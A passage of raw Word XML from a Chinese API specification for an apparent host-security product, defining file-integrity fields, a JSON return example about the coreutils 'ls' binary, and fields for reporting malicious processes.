        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CCC761C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ADBD76F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>涉及的文件列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B49EB59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>file数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1599"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="2775"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6081C7B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DD67360" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1714ECA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18C6FCFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24E42C3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2DCBDC91" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DD7DA72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CE44A3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D00E5B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1678A7D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A831FC0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00D96B04" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>modify_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FEB1EBE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A0731E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3111FF7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修改时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="470691D9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3365CB36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6331B4E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04F4E28D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41A3E149" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5E436C14" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="621613FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>package_hash</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0409A8CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="019D9CCA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16949C78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>包hash值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E991BAB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B96215B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_hash</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="298A7960" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="405F1F22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C3A2B3A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件hash值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52C779E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499BE297" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "ls",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "count": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>match_rules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "7": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>local_more</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>local_less</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "pkg": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>package_full_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "coreutils-8.4-46.el6.x86_64",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>package_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": " </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>coreutils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>package_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "8.4",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "files": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/bin/ls",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>modify_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1394048072,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "permissions": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rwxr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-x",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>package_hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C508E9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="477" w:name="_Toc115166311"/>
      <w:bookmarkStart w:id="478" w:name="恶意进程"/>
      <w:bookmarkEnd w:id="476"/>
      <w:r>
        <w:t>恶意进程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="477"/>
    </w:p>
    <w:p w14:paraId="397C6CD0"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1745"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2775"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="760C38A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567358F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="137EB287" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E939704" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F157A92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1522A5FC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DE599F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>virusName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C5036A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C4C842C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E776321" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>病毒名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="53EB6471" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D46627A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>virusDescription</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="403CC96C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77080BAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AB4C4B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5D481A3D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0879133A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>libUpdateTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27E3592F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57E133FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="759481E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>更新时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="62B4756A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32236D4E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>libName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14250655" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B7098CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59A3244D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7903438F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40093C60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>virusInstruct</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D5DF2B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58340C2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FC3E3B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修复方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D43B69E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>静态信息数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2083"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1843"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7A8641A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9C19400" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1257C494" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C1D2FEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16C40F28" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
